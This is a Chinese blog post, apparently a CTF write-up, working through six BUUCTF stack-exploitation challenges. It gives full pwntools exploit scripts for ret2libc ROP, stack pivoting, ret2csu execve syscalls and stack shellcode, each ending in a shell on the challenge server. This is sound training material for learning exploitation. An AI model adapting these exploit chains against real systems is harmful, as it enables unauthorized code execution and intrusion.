BUU-pwn(四)

最新推荐文章于 2024-05-06 12:28:50 发布
最新推荐文章于 2024-05-06 12:28:50 发布
阅读量170 收藏
点赞数
分类专栏: pwn 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53263789/article/details/125363993
版权

[HarekazeCTF2019]baby_rop2

64位程序,ret2libc ROP即可

exp

from pwn import *
context(os='linux', arch='i386', log_level='debug')

r = remote('node4.buuoj.cn',29388)
#r = process('./babyrop2')
elf = ELF('./babyrop2')
libc = ELF('./libc.so.6')

rdi = 0x400733
rsi = 0x400731
format_string = 0x400770 # %s
read_got = elf.got['read']
print_got = elf.got['printf']
printf_plt = elf.plt['printf']
main = elf.sym['main']

r.recvuntil("What's your name? ")
payload = b'a'*(0x20+8)+p64(rdi)+p64(format_string)+p64(rsi)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main)
#payload = b'a'*(0x20+8)+p64(rdi)+p64(read_got)+p64(printf_plt)+p64(main)
r.sendline(payload)

read_addr=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
log.info("read_addr: "+hex(read_addr))

offset = read_addr - libc.symbols['read']
system = offset + libc.symbols['system']
bin_sh = offset + libc.search(b'/bin/sh').__next__()

payload2=b'a'*(0x20+8)+p64(rdi)+p64(bin_sh)+p64(system)+p64(main)

r.recvuntil("What's your name? ")
r.sendline(payload2)

r.interactive()

ciscn_2019_es_2(栈迁移)

好文共赏,读完必会:栈迁移原理介绍与应用

首先main函数存在溢出点,无法写shellcode到bss段,所以能利用的点,只有把system等写到缓冲区s的地址,然后利用栈迁移控制eip的值,利用下面再分析

存在system函数


既然要写到 s 的地址,目标机器栈上地址要被泄露出来,然后根据本地调试出来的偏移,去准确的锁定目标机器的 s 地址,通过printf可以泄露目前栈上ebp的值(即main函数的基地址),现在本地调试偏移

一个断点下到printf,查看stack情况,输入的aaaa到了 0xffffd160,main函数的ebp在0xffffd198 二者相差了0x38


寻找 leave ; ret指令

exp

from pwn import *
context(os='linux', arch='i386', log_level='debug')

r = remote('node4.buuoj.cn',26776)

# leave: mov esp,ebp;
#        pop ebp;
# ret: pop eip;

leave_ret = 0x080484b8
system_addr = 0x08048400

# 泄漏 ebp
payload = b'a'*0x27+b'b'
r.send(payload)
r.recvuntil('b')
ebp_addr = u32(r.recv(4))
log.info("ebp_addr =>"+hex(ebp_addr))

payload2 = b'aaaa'
payload2+= p32(system_addr)
payload2+= p32(0)
payload2+= p32(ebp_addr - 0x28) # system need a address
payload2+= b'/bin/sh\x00'
payload2 = payload2.ljust(0x28,b'a')

payload2+= p32(ebp_addr - 0x38) # pop ebp => change ebp to evil ebp
payload2+= p32(leave_ret) # ret -> leave_ret;change esp

r.sendline(payload2)
r.interactive()

babyheap_0ctf_2017(堆)

好家伙,直接干到堆了,先去学习一下

jarvisoj_tell_me_something

64位栈溢出,这题有个坑点,所以以后还是多看一手汇编代码


直接sub rsp,88h,将栈顶指针减了88h给v4变量,然后结束里面的函数栈帧后直接add后就是ret指令,没有rbp的事情,所以payload直接padding加ret地址就行了

exp

from pwn import *
context(os='linux', arch='i386', log_level='debug')

r = remote('node4.buuoj.cn',28031)

payload = b'a'*0x88+p64(0x400620)
r.sendlineafter('Input your message:\n',payload)
r.interactive()

ciscn_2019_s_3

ret2csu

64位,vuln函数存在系统调用

在这里插入图片描述
32位:

传参方式:首先将系统调用号 传入 eax,然后将参数 从左到右 依次存入 ebx,ecx,edx寄存器中,返回值存在eax寄存器

调用号:sys_read 的调用号 为 3 ,sys_write 的调用号 为 4

调用方式: 使用 int 80h 中断进行系统调用

64位:

传参方式:首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器

调用号:sys_read 的调用号 为 0 ,sys_write 的调用号 为 1

stub_execve 的调用号 为 59

stub_rt_sigreturn 的调用号 为 15

from pwn import *
from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')
context.terminal=['cmd.exe', '/c', 'start', 'wsl.exe']


r = remote("node4.buuoj.cn",28398)
#r = process('./level3')
#r = gdb.debug("./level3","b main")


elf = ELF('./ciscn_s_3')
main = elf.symbols['main']
syscall = 0x0400517
pop_rdi = 0x04005a3
pop6_ret = 0x040059a
rdx_rsi_call = 0x0400580
int59 = 0x04004E2
vuln = 0x04004ED

payload = b'/bin/sh\x00'*2+p64(vuln)
r.sendline(payload)
r.recv(0x20)
bin_sh = u64(r.recv(8))-0x118
log.info("bin_sh -> "+hex(bin_sh))

payload = b'/bin/sh\x00'*2+p64(pop6_ret)+p64(0)*2+p64(bin_sh+0x50)+p64(0)*3+p64(rdx_rsi_call)
payload += p64(int59)+p64(pop_rdi)+p64(bin_sh)+p64(syscall)
r.sendline(payload)

r.interactive()

jarvisoj_level3

ret2libc,exp

from pwn import *
from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')
context.terminal=['cmd.exe', '/c', 'start', 'wsl.exe']


r = remote("node4.buuoj.cn",26164)
#r = process('./level3')
#r = gdb.debug("./level3","b main")


elf = ELF('./level3')
#lib = ELF('./libc-2.23.so')

write_plt = elf.plt['write']
write_got = elf.got['write']
main = 0x0804844B

payload = b'a'*0x88+b'b'*0x4
payload += p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
r.sendlineafter('Input:\n',payload)
write_addr = u32(r.recv(4))
log.success('write_addr: ' + str(hex(write_addr)))


lib = LibcSearcher('write',write_addr)
offset = write_addr - lib.dump('write')
sys_addr = lib.dump('system') + offset
#binsh_addr = lib.search(b'/bin/sh').__next__() + offset
binsh_addr = lib.dump('str_bin_sh') + offset

log.success('sys_addr: '+ str(hex(sys_addr)))
log.success('bin/sh_addr: ' + str(hex(binsh_addr)))

payload2 = b'a'*0x88+b'b'*0x4
payload2 += p32(sys_addr) + b'a'*0x4 + p32(binsh_addr)

r.sendline(payload2)
r.interactive()

ez_pz_hackover_2016

栈可执行

程序逻辑如下


写shellcode到栈中,利用溢出点,ret到shellcode的地址。但是这道题,栈中覆盖到ebp的距离不是0x32,26个字节就已经覆盖ebp了。

payload = b'crashme\x00'+b'a'*18 + b'b'*4   # 8+18=26 覆盖ebp,4覆盖ret


现在已经能控制ret的地址了,再往栈上写shellcode,本地调试出偏移,利用泄露的s的地址减去偏移就是shellcode的地址,再ret到这里完成shell!

payload = b'crashme\x00'+b'a'*18 + b'b'*4 + b'test'

相差0x1c偏移

from pwn import *
from LibcSearcher import *

context(os='linux', arch='i386', log_level='debug')
context.terminal=['cmd.exe', '/c', 'start', 'wsl.exe']

r = remote("node4.buuoj.cn",28657)
#r = process('./ez_pz_hackover_2016')
#r = gdb.debug("./ez_pz_hackover_2016","b * 0x08048602")

r.recvuntil("crash: ")
s_addr=int(r.recv(10),16)
shellcode = asm(shellcraft.sh())
payload = b"crashme\x00" + b"a"*18 + p32(s_addr-0x1c) + shellcode
r.sendlineafter('> ',payload)

r.interactive()
Ff.cheng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu_pwn
王富贵同学的博客
09-29 2000
warmup_csaw_2016 明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d
BUU PWN(一)
playmaker的博客
01-28 2111
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
2024年最新pwn入门-buu第二页题解(32道)(持续更新中),网络安全研发岗面试复盘总结
2401_84254057的博客
05-06 933
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;薪资区间6k-15k。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
BUU-pwn(一)
qq_53263789的博客
04-24 313
rip 简单栈溢出,后门函数 exp from pwn import * #io=process("./pwn") r = remote('node4.buuoj.cn',25253) payload=b'a'*0xf+b'a'*0x08+p64(0x0401187) r.sendline(payload) r.interactive() warmup_csaw_2016 后门函数 int sub_40060D() 泄露地址 exp from pwn import * #io=process("./pw
BUU-pwn(三)
qq_53263789的博客
06-19 257
pwn(三)
BUU-pwn(二)
qq_53263789的博客
04-27 314
ciscn_2019_n_8 32位程序,逻辑很简单 需要var[13] == 17 需要注意的是qword全称是Quad Word。2个字节就是1个Word(1个字,16位),q就是英文quad-这个词根(意思是4)的首字母,所以它自然是word(2字节,0~2^16-1)的倍,8字节 所以用p64 exp from pwn import * r = remote('node4.buuoj.cn',29396) payload = b'aaaa'*13+p64(0x11) r.sendline(p
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
joinUs-buu2018:h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信/qq分享 #预览地址
BUU PWN (二)
playmaker的博客
02-07 829
BUU PWN (二) level0 from pwn import * #p=process('./level0') p=remote("node3.buuoj.cn","26684") p.recvline() payload='a'*0x80+'a'*8+p64(0x400596) p.sendline(payload) p.interactive() ciscn_2019_n_5 ret...
BUU刷题-Pwn-test
一个啥也不会的小菜鸡!
07-13 58
直接执行即可,获得主机权限!
buupwn1_sctf_2016
xieyichensss的博客
03-18 728
**(学生党太菜了)** pwn_sctf_2016 1.拿到文件,首先checksec并file一下。 发现NX打开了,哦 糟糕.不过不慌,我们下一步打开IDA看一哈 2.用32位的IDA打开他,反汇编一下。双击vuln()函数。 得到这一大堆我看不懂的东西,不过我看到最后有strcpy函数,知道是一个栈溢出的问题。s的大小为0h3c,且函数中出现I和you,着重分析他俩(经过一系列的百度)。得到最后是用you代替I,这样输入20个I就可以溢出到ebp了。 3.我又在全部函数中找啊找,发现...
BUU刷题-Pwn-bjdctf_2020_babystack
一个啥也不会的小菜鸡!
06-21 190
首先利用&nbytes变量控制溢出长度,再使用buf实现溢出就可以了。后门函数地址:backdoor:0x4006E6。
buu pwn入门 有栈溢出
Sanntaa的博客
12-03 612
写题笔记
pwn入门-buu刷题第二页题解(32道)(更新完毕,下一章见)
2303_79366759的博客
03-21 997
通过控制返回地址来执行程序执行流的变化,也即是说我们并不是在执行我们写入在bss段的代码,因为真正的代码不是写作bss段的,应该位于text段。OK那我们接着讲,我们可以在s的地址里写入ret2libc的代码,然后执行它,泄露libc的基地址后再跳转回来,再用one_gadget来getshell,之前已经写过一道栈迁移的题目了,所以在这里就不多加赘述了。由代码易知,这个函数的功能是先搜索flag.txt文件,如果找到了则打印出来,如果没找到则退出程序,再看一下vuln函数里面有什么。
BUUCTF之PWN(WP1)
NANMUZN的博客
01-15 639
buuctf pwn
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值